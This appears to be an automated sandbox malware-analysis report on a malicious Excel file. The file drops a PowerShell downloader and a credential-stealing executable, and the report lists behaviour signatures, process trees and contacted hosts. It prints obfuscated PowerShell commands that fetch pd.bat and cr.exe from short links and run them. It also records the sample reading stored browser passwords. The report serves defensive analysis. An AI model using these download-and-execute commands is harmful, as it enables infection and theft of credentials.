Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCD2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW, 24_2_0045F42D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_0043DCF2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_0043DE3D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose, 24_2_002AE08D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW, 24_2_002CF67D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF22
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 24_2_002ADF42
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA, 24_2_00434AFC
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 24_2_004365E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00446061
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044663D mov eax, dword ptr fs:[00000030h] 24_2_0044663D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h] 24_2_00459A7D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h] 24_2_00459A39
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h] 24_2_00459AAE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00220083 push dword ptr fs:[00000030h] 24_2_00220083
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B688D mov eax, dword ptr fs:[00000030h] 24_2_002B688D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027092B mov eax, dword ptr fs:[00000030h] 24_2_0027092B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h] 24_2_002C9C89
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h] 24_2_002C9CFE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h] 24_2_002C9CCD
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h] 24_2_00270D90
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 24_2_00409290
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FFB9 SetUnhandledExceptionFilter, 24_2_0043FFB9
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_00446061
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_0044017B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_0043FE57
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_002B00A7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 24_2_002B62B1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_002B03CB

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat') Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe' Jump to behavior

Language, Device and Operating System Detection:

barindex
Yara detected Obfuscated Powershell
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FC7B cpuid 24_2_0043FC7B
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 24_2_00425760
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_0046207E
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00462033
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00462119
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_004621A4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_004623F7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_0046251D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 24_2_004365E1
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00458604
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00462623
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_004626F2
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_00461D91
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_00457FD7
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_00461F8C
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002C8227
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D2283
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D22CE
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW, 24_2_002D2369
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 24_2_002D23F4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002D2647
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 24_2_002D276D
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002D2873
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW, 24_2_002C8854
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 24_2_002D2942
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 24_2_002D1FE1
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00440023 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 24_2_00440023
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434BE4 GetUserNameA, 24_2_00434BE4
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043604A __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 24_2_0043604A
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 24_2_00423778
Source: C:\Users\user\AppData\Roaming\cr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob Jump to behavior

Stealing of Sensitive Information:

barindex
Contains functionality to steal Internet Explorer form passwords
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 24_2_0043472B
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 24_2_002A497B
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\cr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Roaming\cr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Searches for user specific document files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\attrib.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\cmd.exe Directory queried: C:\Users\user\Documents Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 337274 Sample: ul9kpUwYel.xls Startdate: 08/01/2021 Architecture: WINDOWS Score: 100 68 trashbininspector.fun 2->68 80 Multi AV Scanner detection for domain / URL 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 Antivirus detection for URL or domain 2->84 86 10 other signatures 2->86 12 EXCEL.EXE 86 29 2->12         started        signatures3 process4 signatures5 102 Obfuscated command line found 12->102 104 Document exploit detected (process start blacklist hit) 12->104 15 cmd.exe 12->15         started        17 cmd.exe 12->17         started        20 cmd.exe 12->20         started        22 2 other processes 12->22 process6 signatures7 24 powershell.exe 7 15->24         started        78 Obfuscated command line found 17->78 26 powershell.exe 16 10 17->26         started        30 powershell.exe 6 20->30         started        33 powershell.exe 7 22->33         started        35 powershell.exe 7 22->35         started        process8 dnsIp9 37 cmd.exe 24->37         started        74 cutt.ly 104.22.1.232, 443, 49165, 49168 CLOUDFLARENETUS United States 26->74 76 37.46.150.139, 49167, 80 IWAYCH Moldova Republic of 26->76 62 C:\Users\user\Documents\pd.bat, ASCII 26->62 dropped 106 Powershell drops PE file 30->106 40 attrib.exe 33->40         started        file10 signatures11 process12 signatures13 88 Obfuscated command line found 37->88 42 cmd.exe 37->42         started        45 cmd.exe 37->45         started        47 mode.com 37->47         started        process14 signatures15 98 Suspicious powershell command line found 42->98 100 Tries to download and execute files (via powershell) 42->100 49 powershell.exe 8 42->49         started        process16 dnsIp17 64 cutt.ly 49->64 66 chebo.discountmonumentcenter.com 192.185.194.191, 49169, 80 UNIFIEDLAYER-AS-1US United States 49->66 58 C:\Users\user\AppData\Roaming\cr.exe, PE32 49->58 dropped 53 cr.exe 5 49->53         started        file18 process19 dnsIp20 70 trashbininspector.fun 104.18.58.219, 443, 49176, 49177 CLOUDFLARENETUS United States 53->70 72 telete.in 195.201.225.248, 443, 49174 HETZNER-ASDE Germany 53->72 60 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 53->60 dropped 90 Multi AV Scanner detection for dropped file 53->90 92 Machine Learning detection for dropped file 53->92 94 Contains functionality to steal Internet Explorer form passwords 53->94 96 Tries to harvest and steal browser information (history, passwords, etc) 53->96 file21 signatures22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.18.58.219
 unknown United States
13335 CLOUDFLARENETUS true
195.201.225.248
 unknown Germany
24940 HETZNER-ASDE false
192.185.194.191
 unknown United States
